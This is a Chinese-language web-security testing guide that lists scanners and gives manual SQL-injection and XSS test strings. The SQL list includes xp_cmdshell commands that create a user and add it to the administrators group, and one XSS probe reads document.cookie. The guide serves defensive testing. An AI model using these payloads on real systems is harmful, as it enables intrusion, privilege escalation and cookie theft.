web安全的測試方法

　　工具掃描

　　目前web安全掃描器針對 XSS、SQL injection 、OPEN redirect 、PHP File Include漏洞的檢測技術已經比較成熟。

　　商業軟件web安全掃描器：有IBM Rational Appscan、WebInspect、Acunetix WVS

　　免費的掃描器：W3af 、Skipfish 等

　　根據業務資金，可以考慮購買商業掃描軟件，也可以使用免費的，各有各的好處。

　　首頁可以對網站進行大規模的掃描操作，工具掃描確認沒有漏洞或者漏洞已經修復後，再進行以下手工檢測。

　　手工檢測

　　對於CSRF、越權訪問、文件上傳、修改密碼 等漏洞，難以實現自動化檢測的效果，這是因為這些漏洞涉及系統邏輯或業務邏輯，有時候還需要人機交互參與頁面流程，因此 這類漏洞的檢測更多的需要依靠手動測試完成。

　　手工檢測網站URL、後台登陸是否具有SQL注入

　　Admin-- ‘or -- ‘ and ( ) exec insert * % chr mid and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49) ; %20AND%201=2 ‘and 1=1 ; ‘And 1=1 ; ‘aNd 1=1 ; and 1=2 ; ‘and 1=2 and 2=2 and user>0 and (select count(*) from sysobjects)>0 and (select count(*) from msysobjects)>0 and (Select Count(*) from Admin)>=0 and (select top 1 len(username) from Admin)>0(username 已知字段) ;exec master..xp_cmdshell “net user name password /add”— ;exec master..xp_cmdshell “net localgroup name administrators /add”— and 0<>(select count(*) from admin)

　　XSS：對於get請求的URL一般漏洞掃描軟件都可掃描到是否存在XSS漏洞。（但是軟件沒有完美的，也有誤報，或者有遺漏的情況）

　　對於POST的請求的（例如留言板，評論，等等），就是要在輸入框輸入的情況，則要進行以下測試

　　★~!@#$%^&*()_+<>,./?;'"[]{}\-

　　★%3Cinput /%3E

　　★%3Cscript%3Ealert('XSS')%3C/script%3E

　　★<input type="text"/>

　　★<input/>

　　★<input/

　　★<script>alert('xss')</script>

　　★<script>alert('xss');</script>

　　★</script><script>alert(‘xss’)</script>

　　★javascript:alert(/xss/)

　　★javascript:alert(/xss/)

　　★<img src="#" onerror=alert(/xss/)>

　　★<img src="#" style="Xss:expression(alert(/xss/));">

　　★<img src="#"/**/onerror=alert(/xss/) width=100>

　　★=’><script>alert(document.cookie)</script>

　　★1.jpg" onmouseover="alert('xss')

　　★"></a><script>alert(‘xss’);</script>

　　★http://xxx';alert('xss');var/ a='a

　　★’”>xss&<

　　★"onmouseover=alert('hello');"

　　★&{alert('hello');}

　　★>"'><script>alert(‘XSS')</script>

　　★>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>

　　★>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;

　　%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>

　　★AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22

　　★%22%2Balert(%27XSS%27)%2B%22

　　★<table background="javascript:alert(([code])"></table>

　　★<object type=text/html data="javascript:alert(([code]);"></object>